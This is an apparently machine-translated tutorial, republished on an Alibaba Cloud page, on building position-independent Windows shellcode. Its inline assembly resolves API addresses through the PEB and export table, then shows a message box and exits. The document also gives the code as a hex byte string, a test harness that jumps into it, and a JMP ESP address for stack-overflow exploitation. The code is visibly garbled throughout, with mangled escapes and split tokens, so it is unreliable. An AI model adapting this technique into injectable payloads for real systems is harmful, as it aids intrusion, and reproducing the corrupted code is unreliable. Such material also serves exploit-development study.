Making cross-platform Shellcode

Source: Internet
Author: User

Using the JMP ESP principle there are many such directives in Windows
Find one with DBG first.

Then turn the shellcode into opcode can be tested first (code and opcode at the end)


Get some more 90 90 because some of the functions have several parameters

Run



ConsoleApplication2.cpp: Defines the entry point of the console application.        #include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {__asm {Pushad;        Sub ESP, 0x100;        JMP Tag_shellcode; [tag_next-0x52] "GetProcAddress" _asm _emit (0x47) _asm _emit (0x65) _asm _emit (0x74) _asm _emit (0x50) _asm _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x41) _asm _emit (0x64) _asm _emit (0x64) _asm _emit (0x72) _        ASM _emit (0X65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00)//[tag_next-0x44] "Loadlibraryexa\0" _asm _emit (0x4c) _asm _emit (0x6f) _asm _emit (0x61) _asm _emit (0x64) _asm _emit (0x4c) _asm _emit (0x69) _asm _emit  (0x62) _asm _emit (0x72) _asm _emit (0x61) _asm _emit (0x72) _asm _emit (0x79) _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x35] "User32.dll\0" _asm _emit (0x55) _asm _emit (0x73) _asm _emit (0x65) _asm _emit (0x72) _asm _emit (0x33) _asm _emit (0x32) _asm _emit (0x2e) _asm _emit (0x64) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x00)//[tag_next-0x2a] "Messageboxa\0" _asm _emit (0x4d) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x61) _asm _emit (0x67) _asm _em It (0x65) _asm _emit (0x42) _asm _emit (0x6f) _asm _emit (0x78) _asm _emit (0x41) _asm _emit (0x00)//[tag_next-0x 1E] "exitprocess\0" _asm _emit (0x45) _asm _emit (0x78) _asm _emit (0x69) _asm _emit (0x74) _asm _emit (0x50) _a SM _emit (0x72) _asm _emit (0x6f) _asm _emit (0x63) _asm _emit (0x65) _asm _emit (0x73) _asm _emit (0x73) _asm _emit (0x00        )//[tag_next-0x12] "Hello world!\0" _asm _emit (0x48) _asm _emit (0x65) _asm _emit (0x6c) _asm _emit (0x6c) _asm _emit (0x6f) _asm _emit (0x20) _asm _emit (0x57) _asm _emit (0x6f) _asm _emit (0x72) _asm _emit (0x6c) _asm _em                 It (0x64) _asm _emit (0x21) _asm _emit (0x00) Tag_shellcode:call tag_next;              Tag_next:       Pop ebx;                     Get critical module Base address mov esi, DWORD ptr fs: [0x30];                     mov esi, [esi + 0x0c];                     mov esi, [esi + 0x1c];                     mov esi, [esi];                     mov edx, [esi + 0x08];                     Gets the function address of the GetProcAddress push ebx;                     Push edx;                     Call fun_getprocaddress;                     mov esi, eax;                     Gets the function address of the loadlibraryexa push edx;                     Lea ECX, [ebx-0x44];                     push ecx;                     Push edx;                     call eax;                     Pop edx;                     Call payload partial push ebx;                     Push ESI;                     push eax;                     Push edx;                 Call Fun_payload;                     Fun_getprocaddress:push EBP;                     MOV ebp, esp; Sub ESP, 0x0c;                     Push edx;                     Get the address of eat, ENT and EOT mov edx, [ebp + 0x08];                     mov esi, [edx + 0x3c];                     Lea ESI, [edx + esi];                     mov esi, [esi + 0x78];                     Lea ESI, [edx + esi];                     mov edi, [esi + 0x1c];                     Lea EDI, [edx + edi];                     MOV[EBP-0X04], EDI;                     mov edi, [esi + 0x20];                     Lea EDI, [edx + edi];                     MOV[EBP-0X08], EDI;                     mov edi, [esi + 0x24];                     Lea EDI, [edx + edi];                     MOV[EBP-0X0C], EDI;                     The cycle compares the function name in ENT with the XOR eax, eax;                 JMP tag_firstcmp;                 Tag_cmpfunnameloop:inc eax;                     Tag_firstcmp:mov esi, [ebp-0x08];                     mov esi, [esi + 4 * EAX]; mov edx, [Ebp +0X08];                     Lea ESI, [edx + esi];                     mov ebx, [ebp + 0x0c];                     Lea EDI, [ebx-0x53];                     mov ecx, 0x0e;                     Cld                     Repe CMPSB;                     Jne Tag_cmpfunnameloop;                     Successful after finding the corresponding serial number mov esi, [ebp-0x0c];                     XOR EDI, EDI;                     mov di, [esi + eax * 2];                     Use the ordinal as the index, find the function address corresponding to the functions of the name mov edx, [ebp-0x04];                     mov esi, [edx + EDI * 4];                     mov edx, [ebp + 0x08];                     Returns the key function that gets to the address of Lea EAX, [edx + esi];                     Pop edx;                     mov esp, EBP;                     Pop ebp;                 RETN 0x08;                     Fun_payload:push EBP;                     MOV ebp, esp;                     Sub ESP, 0x08;                     mov ebx, [ebp + 0x14]; Get MeSsageboxa function Address Lea ecx, [ebx-0x35];                     Push 0;                     Push 0;                     push ecx;                     CALL[EBP + 0x0c];                     Lea ECX, [ebx-0x2a];                     push ecx;                     push eax;                     CALL[EBP + 0x10];                     MOV[EBP-0X04], eax;                     Get the function address of ExitProcess lea ECX, [ebx-0x1e];                     push ecx;                     PUSH[EBP + 0x08];                     CALL[EBP + 0x10];                     MOV[EBP-0X08], eax;                     Show Lea ECX, [ebx-0x12];                     Push 0;                     push ecx;                     push ecx;                     Push 0;                     CALL[EBP-0X04];                     Push 0;                     CALL[EBP-0X08];                     mov esp, EBP;                     Pop ebp;    RETN 0x10; } return 0;}
#include "stdafx.h" int _tmain (int argc, _tchar* argv[]) {char bshellcode[] = {"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x4 7\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\ X41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\ X69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\ X00\x5b\x64\x8b\x35\x30\x00\x00\x00\x8b\x76\x0c\x8b\x76\x1c\x8b\x36\x8b\x56\x08\x53\x52\xe8\x14\x00\x00\x00\ X8b\xf0\x52\x8d\x4b\xbc\x51\x52\xff\xd0\x5a\x53\x56\x50\x52\xe8\x6e\x00\x00\x00\x55\x8b\xec\x83\xec\x0c\x52\ X8b\x55\x08\x8b\x72\x3c\x8d\x34\x32\x8b\x76\x78\x8d\x34\x32\x8b\x7e\x1c\x8d\x3c\x3a\x89\x7d\xfc\x8b\x7e\x20\ X8d\x3c\x3a\x89\x7d\xf8\x8b\x7e\x24\x8d\x3c\x3a\x89\x7d\xf4\x33\xc0\xeb\x01\x40\x8b\x75\xf8\x8b\x34\x86\x8b\ X55\x08\x8d\x34\x32\x8b\x5d\x0c\x8d\x7b\xad\xb9\x0e\x00\x00\x00\xfc\xf3\xa6\x75\xe3\x8b\x75\xf4\x33\xff\x66\ X8b\x3c\x46\X8b\x55\xfc\x8b\x34\xba\x8b\x55\x08\x8d\x04\x32\x5a\x8b\xe5\x5d\xc2\x08\x00\x55\x8b\xec\x83\xec\x08\x8b\x5d\ X14\x8d\x4b\xcb\x6a\x00\x6a\x00\x51\xff\x55\x0c\x8d\x4b\xd6\x51\x50\xff\x55\x10\x89\x45\xfc\x8d\x4b\xe2\x51\ Xff\x75\x08\xff\x55\x10\x89\x45\xf8\x8d\x4b\xee\x6a\x00\x51\x51\x6a\x00\xff\x55\xfc\x6a\x00\xff\x55\xf8\x8b\    Xe5\x5d\xc2 "};        __asm {lea eax, Bshellcode;        push eax; RET} return 0;}
"\x60\x81\xec\x00\x01\x00\x00\xeb\x4e\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x4c\x6f\x61\ X64\x4c\x69\x62\x72\x61\x72\x79\x45\x78\x41\x00\x55\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x00\x4d\x65\x73\x73\ X61\x67\x65\x42\x6f\x78\x41\x00\x45\x78\x69\x74\x50\x72\x6f\x63\x65\x73\x73\x00\x48\x65\x6c\x6c\x6f\x20\x57\ X6f\x72\x6c\x64\x21\x00\xe8\x00\x00\x00\x00\x5b\x64\x8b\x35\x30\x00\x00\x00\x8b\x76\x0c\x8b\x76\x1c\x8b\x36\ X8b\x56\x08\x53\x52\xe8\x14\x00\x00\x00\x8b\xf0\x52\x8d\x4b\xbc\x51\x52\xff\xd0\x5a\x53\x56\x50\x52\xe8\x6e\ X00\x00\x00\x55\x8b\xec\x83\xec\x0c\x52\x8b\x55\x08\x8b\x72\x3c\x8d\x34\x32\x8b\x76\x78\x8d\x34\x32\x8b\x7e\ X1c\x8d\x3c\x3a\x89\x7d\xfc\x8b\x7e\x20\x8d\x3c\x3a\x89\x7d\xf8\x8b\x7e\x24\x8d\x3c\x3a\x89\x7d\xf4\x33\xc0\ Xeb\x01\x40\x8b\x75\xf8\x8b\x34\x86\x8b\x55\x08\x8d\x34\x32\x8b\x5d\x0c\x8d\x7b\xad\xb9\x0e\x00\x00\x00\xfc\ Xf3\xa6\x75\xe3\x8b\x75\xf4\x33\xff\x66\x8b\x3c\x46\x8b\x55\xfc\x8b\x34\xba\x8b\x55\x08\x8d\x04\x32\x5a\x8b\ xe5\x5d\xc2\x08\x00\x55\x8B\xec\x83\xec\x08\x8b\x5d\x14\x8d\x4b\xcb\x6a\x00\x6a\x00\x51\xff\x55\x0c\x8d\x4b\xd6\x51\x50\xff\x55\x10\x89\ X45\xfc\x8d\x4b\xe2\x51\xff\x75\x08\xff\x55\x10\x89\x45\xf8\x8d\x4b\xee\x6a\x00\x51\x51\x6a\x00\xff\x55\xfc\  X6a\x00\xff\x55\xf8\x8b\xe5\x5d\xc2 "77460a9b jmp ESP Address {0x60, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00, 0xEB, 0x4E, 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63,0x41, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x 72,0x61, 0x72, 0x79, 0x45, 0x78, 0x41, 0x00, 0x55, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c,0x6c, 0x00, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x42, 0x6F, 0x78, 0x41, 0x00, 0x45, 0x78,0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x7 3, 0x00, 0x48, 0x65, 0x6c, 0x6c, 0x6F, 0x20,0x57, 0x6F, 0x72, 0x6c, 0x64, 0x21, 0x00, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x64, 0x8b, 0x35,0x30, 0x00, 0x00, 0x00, 0x8b, 0x76, 0x0C, 0x8b, 0x76, 0x1C, 0x8b, 0x36, 0x8b, 0x56, 0x08, 0x53,0x52, 0xe8 , 0x14, 0x00, 0x00, 0x00, 0x8b, 0xF0, 0x52, 0x8d,0x4B, 0xBC, 0x51, 0x52, 0xFF, 0xd0,0x5a, 0x53, 0x56, 0x50, 0x52, 0xe8, 0x6e, 0x00, 0x00, 0x00, 0x55, 0x8b, 0xEC, 0x83, 0xE C, 0x0c,0x52, 0x8b, 0x55, 0x08, 0x8b, 0x72, 0x3C, 0x8d, 0x34, 0x32, 0x8b, 0x76, 0x78, 0x8d, 0x34, 0x32,0x8b, 0x7E, 0x1C, 0 x8d, 0x3C, 0x3A, 0x89, 0x7d, 0xFC, 0x8b, 0x7E, 0x20, 0x8d, 0x3C, 0x3A, 0x89,0x7d, 0xF8, 0x8b, 0x7E, 0x24, 0x8d, 0x3C, 0x3A , 0x89, 0x7d, 0xf4, 0x33, 0xC0, 0xEB, 0x01, 0x40,0x8b, 0x75, 0xF8, 0x8b, 0x34, 0x86, 0x8b, 0x55, 0x08, 0x8d, 0x34, 0x32, 0  x8b, 0x5d, 0x0C, 0x8d,0x7b, 0xAD, 0xb9, 0x0E, 0x00, 0x00, 0x00, 0xFC, 0xf3, 0xa6, 0x75, 0xe3, 0x8b, 0x75, 0xf4, 0x33,0xff, 0x66, 0x8b, 0x3C, 0x46, 0x8b, 0x55, 0xFC, 0x8b, 0x34, 0xBA, 0x8b, 0x55, 0x08, 0x8d, 0x04,0x32, 0x5A, 0x8b, 0xe5, 0x5d, 0x  C2, 0x08, 0x00, 0x55, 0x8b, 0xEC, 0x83, 0xEC, 0x08, 0x8b, 0x5d,0x14, 0x8d, 0x4B, 0xCB, 0x6A, 0x00, 0x6A, 0x00, 0x51, 0xFF, 0x55, 0x0C, 0x8d, 0x4B, 0xd6, 0x51,0x50, 0xFF, 0x55, 0x10, 0x89, 0x45, 0xFC, 0x8d, 0x4B, 0xe2, 0x51, 0xFF, 0x75, 0x08, 0x FF, 0x55,0x10, 0x89, 0x45, 0xF8, 0x8d, 0x4B, 0xEE, 0x6A, 0x00, 0x51, 0x51, 0x6A, 0x00, 0xFF, 0x55, 0xfc,0x6a, 0x00, 0xFF, 0x55, 0xF8, 0x8b, 0xe5, 0X5D, 0xC2};

Making cross-platform Shellcode

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.